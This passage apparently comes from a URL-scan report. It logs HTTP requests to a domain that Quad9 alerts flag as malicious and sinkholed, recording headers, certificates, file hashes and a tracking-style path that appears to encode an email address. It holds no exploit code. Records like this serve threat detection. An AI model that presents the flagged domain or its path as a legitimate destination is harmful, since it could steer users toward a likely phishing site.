cfL4;desc=\"?proto=QUIC\u0026rtt=3603\u0026min_rtt=2022\u0026rtt_var=1762\u0026sent=16\u0026recv=11\u0026lost=0\u0026retrans=0\u0026sent_bytes=5665\u0026recv_bytes=2125\u0026delivery_rate=5095\u0026cwnd=12000\u0026unsent_bytes=0\u0026cid=76d1496198fdcfcd\u0026ts=416\u0026x=1\", cfExtPri, cfHdrFlush;dur=0\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":null,"data":{"size":0,"size_decoded":0,"mime_type":"application/javascript","magic":"","md5":"d41d8cd98f00b204e9800998ecf8427e","sha1":"da39a3ee5e6b4b0d3255bfef95601890afd80709","sha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","sha512":"cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e","ssdeep":"","tlshash":"","first_seen":"0001-01-01T00:00:00Z","last_seen":"2026-04-05T07:47:05.597876Z","times_seen":13365748,"resource_available":true,"data":null}},"time_used":258,"timings":{"blocked":-1,"dns":0,"connect":0,"send":0,"wait":258,"receive":0,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"quad9","sensor_type":"domain","title":"","description":"Quad9 DNS","scan_date":"2025-02-06","alert":"Sinkholed","trigger":"variationtidy.best","verdict":"malicious","severity":"medium","comment":"Sinkholed","link":"https://www.quad9.net","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"www.variationtidy.best/style.css","fqdn":"www.variationtidy.best","domain":"variationtidy.best","tld":"best"},"ip":{"addr":"172.67.160.111","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"stylesheet","requested_by":"https://www.variationtidy.best/zuspftbku/QHNsdXJwbWFpbC5uZXQnw+xsArZAjhgBskEUhmfGX0iHB1gu2NKclbflt3LOUUZywwMnnO+eOorvibwFKzM=","date":"2025-02-06T17:17:30.695Z","timestamp":1738862250695,"http_version":"HTTP/3","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"variationtidy.best","organization":""},"issuer":{"commonName":"WE1","organization":"Google Trust Services"},"validity":{"start":"Tue, 04 Feb 2025 14:48:27 GMT","end":"Mon, 05 May 2025 15:46:51 GMT"},"fingerprint":{"sha1":"58:BF:5D:4D:8A:52:61:3C:6F:17:55:D2:3B:BA:75:90:63:63:7A:5B","sha256":"3B:93:64:5E:09:BC:07:BA:AC:3F:98:FD:6A:E9:0D:E1:5C:19:3A:E6:7D:E9:D5:B4:E6:9F:CC:F9:96:B5:9B:DD"}}},"request":{"raw":"GET /style.css HTTP/1.1\r\nHost: www.variationtidy.best\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: text/css,*/*;q=0.1\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nReferer: https://www.variationtidy.best/zuspftbku/QHNsdXJwbWFpbC5uZXQnw+xsArZAjhgBskEUhmfGX0iHB1gu2NKclbflt3LOUUZywwMnnO+eOorvibwFKzM=\r\nCookie: PHPSESSID=lc65ll7gpm00pbqa44is4jfjfs\r\nSec-Fetch-Dest: style\r\nSec-Fetch-Mode: no-cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\nTE: trailers\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/3 200 OK\r\ndate: Thu, 06 Feb 2025 17:17:30 GMT\r\ncontent-type: text/css\r\nlast-modified: Mon, 19 Aug 2024 21:39:16 GMT\r\nvary: Accept-Encoding\r\netag: W/\"66c3bb84-7a9\"\r\ncontent-encoding: gzip\r\ncache-control: max-age=14400\r\ncf-cache-status: REVALIDATED\r\npriority: u=2,i=?0\r\nreport-to: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v4?s=Hsa9HbHq3WOoqWVx8vR5wTYsHvOh6iYbHHvn1Z35nM%2FzHlXeV2aAIDa2hBy80EfkAbEUVY4%2BcxzYRIhrNsq%2Bv2%2FXYA%2F6J1JFzmIaIFs5g%2FKO3F9Ki1HnuqWT3OFl15vzJALp5Vjmc%2FM7\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nnel: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nserver: cloudflare\r\ncf-ray: 90dccb4acd24b4f1-OSL\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfL4;desc=\"?proto=QUIC\u0026rtt=3829\u0026min_rtt=3637\u0026rtt_var=1747\u0026sent=14\u0026recv=10\u0026lost=0\u0026retrans=0\u0026sent_bytes=4192\u0026recv_bytes=2081\u0026delivery_rate=114315\u0026cwnd=12000\u0026unsent_bytes=0\u0026cid=76d1496198fdcfcd\u0026ts=305\u0026x=1\", cfExtPri, cfHdrFlush;dur=0\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":null,"data":{"size":10219,"size_decoded":10219,"mime_type":"text/css","magic":"gzip compressed data, from Unix","md5":"81d1ffc00c72acd9c736e0d50a9f0e7c","sha1":"539db661d366f89cd54926e68a4fb06d9d487269","sha256":"bfa7ec835a66804396f6c1b82cef6e97a165cbc652234aa726902ed70a662a2b","sha512":"57e80f324edf2c06ea2257b00c8eaa608307538c73ebe4aef409b441ce01936199282985106f1a83ab5fcf753052b287bcb83e8b44084e0889596bf7e6108b17","ssdeep":"192:49EMnl1s0HFlc7aJ8U4nDORk7lyGW28rHJ5vYGLk4za6k:KEMlmlaeU4DD7lyvbHXhLXg","tlshash":"7422b029f2978267b91e7a66ccf85fc42fa5e503c1e15a0b7043396e3c35131ee6c686","first_seen":"2025-02-06T17:18:02.65302Z","last_seen":"2025-02-06T17:18:02.65302Z","times_seen":1,"resource_available":false,"data":null}},"time_used":148,"timings":{"blocked":-1,"dns":0,"connect":0,"send":0,"wait":148,"receive":0,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"quad9","sensor_type":"domain","title":"","description":"Quad9 DNS","scan_date":"2025-02-06","alert":"Sinkholed","trigger":"variationtidy.best","verdict":"malicious","severity":"medium","comment":"Sinkholed","link":"https://www.quad9.net","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"www.variationtidy.best/zuspftbku/QHNsdXJwbWFpbC5uZXQnw+xsArZAjhgBskEUhmfGX0iHB1gu2NKclbflt3LOUUZywwMnnO+eOorvibwFKzM=","fqdn":"www.variationtidy.best","domain":"variationtidy.best","tld":"best"},"ip":{"addr":"172.67.160.111","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":true,"resource_type":"document","requested_by":"","date":"2025-02-06T17:17:30.235Z","timestamp":1738862250235,"http_version":"HTTP/2","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"variationtidy.best","organization":""},"issuer":{"commonName":"WE1","organization":"Google Trust Services"},"validity":{"start":"Tue, 04 Feb 2025 14:48:27 GMT","end":"Mon, 05 May 2025 15:46:51 GMT"},"fingerprint":{"sha1":"58:BF:5D:4D:8A:52:61:3C:6F:17:55:D2:3B:BA:75:90:63:63:7A:5B","sha256":"3B:93:64:5E:09:BC:07:BA:AC:3F:98:FD:6A:E9:0D:E1:5C:19:3A:E6:7D:E9:D5:B4:E6:9F:CC:F9:96:B5:9B:DD"}}},"request":{"raw":"GET /zuspftbku/QHNsdXJwbWFpbC5uZXQnw+xsArZAjhgBskEUhmfGX0iHB1gu2NKclbflt3LOUUZywwMnnO+eOorvibwFKzM= HTTP/1.1\r\nHost: www.variationtidy.best\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nUpgrade-Insecure-Requests: 1\r\nConnection: keep-alive\r\nSec-Fetch-Dest: document\r\nSec-Fetch-Mode: navigate\r\nSec-Fetch-Site: cross-site\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/2 200 OK\r\ndate: Thu, 06 Feb 2025 17:17:30 GMT\r\ncontent-type: text/html; charset=UTF-8\r\nserver: cloudflare\r\nvary: Accept-Encoding\r\nexpires: Thu, 19 Nov 1981 08:52:00 GMT\r\ncache-control: no-store, no-cache, must-revalidate\r\npragma: no-cache\r\ncf-cache-status: DYNAMIC\r\ncontent-encoding: br\r\nset-cookie: PHPSESSID=lc65ll7gpm00pbqa44is4jfjfs; Path=/\r\ncf-ray: 90dccb48184456c3-OSL\r\nalt-svc: h3=\":443\"; ma=86400\r\nX-Firefox-Spdy: h2\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":null,"data":{"size":1642,"size_decoded":1642,"mime_type":"text/html; charset=UTF-8","magic":"HTML document, ASCII text, with very long lines (1743), with no line terminators","md5":"a25124b1c9c32d3106bec10bfcb430cd","sha1":"7bc6701a9e970d02c8f0fc412e374bd71a1e8c41","sha256":"0d5defa084504830f9d04da419fc3d3cb1f0d06f7336dc92ce05915ca67777c7","sha512":"6cc372267cd87c590ad8702f291899ba0bc9680da9f5b9c100420a2990d7715729ed3fa58a24e2ece7226424a54097cf11aca6de59fbfec0e91cc9dbc1840dfa","ssdeep":"","tlshash":"7b31102b59c88a7b194118ed35bc782cbcc5f504cf67949a32dd019847d6ec9c8b7780","first_seen":"2025-02-06T17:18:02.654564Z","last_seen":"2025-04-02T12:55:31.222616Z","times_seen":30,"resource_available":false,"data":null}},"time_used":311,"timings":{"blocked":22,"dns":0,"connect":1,"send":0,"wait":265,"receive":0,"ssl":20},"alerts":{"ids":null,"analyzer":[{"sensor_name":"quad9","sensor_type":"domain","title":"","description":"Quad9 DNS","scan_date":"2025-02-06","alert":"Sinkholed","trigger":"variationtidy.best","verdict":"malicious","severity":"medium","comment":"Sinkholed","link":"https://www.quad9.net","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"www.variationtidy.best/captcha.php","fqdn":"www.variationtidy.best","domain":"variationtidy.best","tld":"best"},"ip":{"addr":"172.67.160.111","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"img","requested_by":"https://www.variationtidy.best/zuspftbku/QHNsdXJwbWFpbC5uZXQnw+xsArZAjhgBskEUhmfGX0iHB1gu2NKclbflt3LOUUZywwMnnO+eOorvibwFKzM=","date":"2025-02-06T17:17:30.698Z","timestamp":1738862250698,"http_version":"HTTP/3","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"variationtidy.best","organization":""},"issuer":{"commonName":"WE1","organization":"Google Trust Services"},"validity":{"start":"Tue, 04 Feb 2025 14:48:27 GMT","end":"Mon, 05 May 2025 15:46:51 GMT"},"fingerprint":{"sha1":"58:BF:5D:4D:8A:52:61:3C:6F:17:55:D2:3B:BA:75:90:63:63:7A:5B","sha256":"3B:93:64:5E:09:BC:07:BA:AC:3F:98:FD:6A:E9:0D:E1:5C:19:3A:E6:7D:E9:D5:B4:E6:9F:CC:F9:96:B5:9B:DD"}}},"request":{"raw":"GET /captcha.php HTTP/1.1\r\nHost: www.variationtidy.best\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: image/avif,image/webp,*/*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nReferer: https://www.variationtidy.best/zuspftbku/QHNsdXJwbWFpbC5uZXQnw+xsArZAjhgBskEUhmfGX0iHB1gu2NKclbflt3LOUUZywwMnnO+eOorvibwFKzM=\r\nCookie: PHPSESSID=lc65ll7gpm00pbqa44is4jfjfs\r\nSec-Fetch-Dest: image\r\nSec-Fetch-Mode: no-cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/3 200 OK\r\ndate: Thu, 06 Feb 2025 17:17:30 GMT\r\ncontent-type: image/jpeg\r\nexpires: Mon, 26 Jul 1997 05:00:00 GMT\r\nlast-modified: Thu, 06 Feb 2025 17:17:30 GMT\r\ncache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\npragma: no-cache\r\ncf-cache-status: DYNAMIC\r\npriority: u=4,i=?0\r\nreport-to: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v4?s=uHqXNdzNvq%2FBuoa8TWnj1cBH0rRLJ7EhJVCOyT%2BX7v6G%2B9ASClKXwwS%2B3nm8BjQOW54B2h3L36psaUHIEpoT%2FHnxjDkTz4lxAjRLrFUa8HPBj99QLvNQSd756l3zhNtYGMKwto%2BAVaoS\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nnel: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nserver: cloudflare\r\ncf-ray: 90dccb4acd26b4f1-OSL\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfL4;desc=\"?proto=QUIC\u0026rtt=3603\u0026min_rtt=2022\u0026rtt_var=1762\u0026sent=17\u0026recv=11\u0026lost=0\u0026retrans=0\u0026sent_bytes=6354\u0026recv_bytes=2125\u0026delivery_rate=5095\u0026cwnd=12000\u0026unsent_bytes=0\u0026cid=76d1496198fdcfcd\u0026ts=418\u0026x=1\", cfExtPri, cfHdrFlush;dur=0\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":null,"data":{"size":2310,"size_decoded":2310,"mime_type":"image/jpeg","magic":"JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: \"CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 100\", baseline, precision 8, 60x20, components 3","md5":"4df5e6f7813f69870a1ca8177c541945","sha1":"453462c478cc44768ee49317e54c2a9e1b9b2c88","sha256":"eb4042795f8b6dd0cff2f9ed294f64f2828814b7cb1ced3a85011d6165af295d","sha512":"2182fc29e97383fbf4529450a096f0c1c253e3cdaf247447e1fb5b4e84c54a0ab1607fb3775537ac751d8236ef201f0fe15ccbcefd7af67e183eca73e0e5a780","ssdeep":"","tlshash":"c5411af6de4a43557d060c33482e57b1d3de27a23a00bb42687286f0e8b2d55964cb3d","first_seen":"2023-11-28T04:45:07Z","last_seen":"2025-07-26T17:07:38.922611Z","times_seen":3,"resource_available":false,"data":null}},"time_used":259,"timings":{"blocked":-1,"dns":0,"connect":0,"send":0,"wait":259,"receive":0,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"quad9","sensor_type":"domain","title":"","description":"Quad9 DNS","scan_date":"2025-02-06","alert":"Sinkholed","trigger":"variationtidy.best","verdict":"malicious","severity":"medium","comment":"Sinkholed","link":"https://www.quad9.net","meta":null}],"urlquery":null}},{"url":{"schema":"https","addr":"www.variationtidy.best/favicon.ico","fqdn":"www.variationtidy.best","domain":"variationtidy.best","tld":"best"},"ip":{"addr":"172.67.160.111","port":443,"asn":13335,"as":"CLOUDFLARENET","country":"","country_code":"zz"},"is_navigation_request":false,"resource_type":"img","requested_by":"https://www.variationtidy.best/zuspftbku/QHNsdXJwbWFpbC5uZXQnw+xsArZAjhgBskEUhmfGX0iHB1gu2NKclbflt3LOUUZywwMnnO+eOorvibwFKzM=","date":"2025-02-06T17:17:30.990Z","timestamp":1738862250990,"http_version":"HTTP/3","security_state":"secure","security_info":{"cipher_suite":"TLS_AES_128_GCM_SHA256","key_group_name":"x25519","signature_name":"ECDSA-P256-SHA256","protocol":"TLSv1.3","cert":{"subject":{"commonName":"variationtidy.best","organization":""},"issuer":{"commonName":"WE1","organization":"Google Trust Services"},"validity":{"start":"Tue, 04 Feb 2025 14:48:27 GMT","end":"Mon, 05 May 2025 15:46:51 GMT"},"fingerprint":{"sha1":"58:BF:5D:4D:8A:52:61:3C:6F:17:55:D2:3B:BA:75:90:63:63:7A:5B","sha256":"3B:93:64:5E:09:BC:07:BA:AC:3F:98:FD:6A:E9:0D:E1:5C:19:3A:E6:7D:E9:D5:B4:E6:9F:CC:F9:96:B5:9B:DD"}}},"request":{"raw":"GET /favicon.ico HTTP/1.1\r\nHost: www.variationtidy.best\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0\r\nAccept: image/avif,image/webp,*/*\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate, br\r\nDNT: 1\r\nConnection: keep-alive\r\nReferer: https://www.variationtidy.best/zuspftbku/QHNsdXJwbWFpbC5uZXQnw+xsArZAjhgBskEUhmfGX0iHB1gu2NKclbflt3LOUUZywwMnnO+eOorvibwFKzM=\r\nCookie: PHPSESSID=lc65ll7gpm00pbqa44is4jfjfs\r\nSec-Fetch-Dest: image\r\nSec-Fetch-Mode: no-cors\r\nSec-Fetch-Site: same-origin\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n\r\n","headers":null,"cookies":null,"method":"GET"},"response":{"raw":"HTTP/3 200 OK\r\ndate: Thu, 06 Feb 2025 17:17:31 GMT\r\ncontent-type: image/x-icon\r\nlast-modified: Mon, 19 Aug 2024 21:39:22 GMT\r\netag: W/\"66c3bb8a-57e\"\r\ncache-control: max-age=14400\r\ncf-cache-status: REVALIDATED\r\npriority: u=6,i=?0\r\nreport-to: {\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v4?s=gxTFWUTFfP1ilL0yRlTX%2FVZg%2BD%2FRsRO6tpsDh7VDMqQV%2BSy%2Bg7k0hXPV6DPR7VlHqZu5u4dxsaGZfvXB%2B2NYFCgXIeyztPH7xpvxKT2MJGiM6elw4AOrOrG5oQTVlIJWWng%2FlkWQyZjZ\"}],\"group\":\"cf-nel\",\"max_age\":604800}\r\nnel: {\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}\r\nvary: Accept-Encoding\r\nserver: cloudflare\r\ncf-ray: 90dccb4caf24b4f1-OSL\r\ncontent-encoding: br\r\nalt-svc: h3=\":443\"; ma=86400\r\nserver-timing: cfL4;desc=\"?proto=QUIC\u0026rtt=3439\u0026min_rtt=2022\u0026rtt_var=1649\u0026sent=22\u0026recv=13\u0026lost=0\u0026retrans=0\u0026sent_bytes=9523\u0026recv_bytes=2564\u0026delivery_rate=1526515\u0026cwnd=12000\u0026unsent_bytes=0\u0026cid=76d1496198fdcfcd\u0026ts=729\u0026x=1\", cfExtPri, cfHdrFlush;dur=0\r\n\r\n","headers":null,"cookies":null,"status_code":"200","status_text":"OK","fingerprints":null,"data":{"size":1406,"size_decoded":1406,"mime_type":"image/x-icon","magic":"MS Windows icon resource - 1 icon, 16x16","md5":"011201ab56695ce86ea2f190bce2670b","sha1":"bb8fad6accf293e619360935047c23f00da3c769","sha256":"a9bc1ab7f7c0c6bc5d097050968993474e32346cffa537be1e0335a19645f12e","sha512":"56d53a1219e58ad045c96dc81d71c63c0cf5a9766add778d34895fdaa7fda8dead44161ec291f0ed3d10a405322b7973b56c6b211d68a8d82a8510b5b7c0456c","ssdeep":"","tlshash":"71210082bb20c02cc82c0b300802eba82388f00ac8e8330b30c80b8e0c0008c8ef8ae0","first_seen":"2023-04-05T07:23:52Z","last_seen":"2026-04-05T04:27:52.24031Z","times_seen":19341,"resource_available":true,"data":null}},"time_used":271,"timings":{"blocked":-1,"dns":0,"connect":0,"send":0,"wait":271,"receive":0,"ssl":0},"alerts":{"ids":null,"analyzer":[{"sensor_name":"quad9","sensor_type":"domain","title":"","description":"Quad9 DNS","scan_date":"2025-02-06","alert":"Sinkholed","trigger":"variationtidy.best","verdict":"malicious","severity":"medium","comment":"Sinkholed","link":"https://www.quad9.net","meta":null}],"urlquery":null}}]}